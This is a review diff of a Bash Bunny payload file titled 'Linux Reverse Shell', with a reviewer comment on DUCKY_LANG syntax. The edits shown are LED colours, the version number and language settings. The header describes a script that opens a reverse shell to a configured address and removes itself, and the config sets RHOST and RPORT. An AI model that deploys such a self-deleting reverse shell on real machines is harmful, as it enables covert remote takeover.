payloads/library/LinuxReverseShell/payload.txt

```diff
@@ -2,28 +2,25 @@
 #
 # Title:         Linux Reverse Shell
 # Author:        tuzzmaniandevil
-# Version:       1.0
+# Version:       1.1
 #
 # Runs a script in the background that creates a reverse shell connection to the configured address and then removes itself.
 #
-# Red ...............Setup
-# Blue Blinking......Executing
-# Green..............Finished
+# Magenta..................Setup
+# Yellow single blink......Executing
+# Green....................Finished
 
 # Config options
 RHOST=127.0.0.1
 RPORT=4444
 
 # Start Setup
-LED R
+LED SETUP
 
 # Set Attack Mode
 ATTACKMODE HID STORAGE
 
-LANGUAGE='us'
-
-# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
-source bunny_helpers.sh
+DUCKY_LANG=us

```

Comment:
We included the DUCKY_LANG function to ensure that the variable is correctly set. The correct syntax is now `DUCKY_LANG us` instead (calling a function vs setting a variable).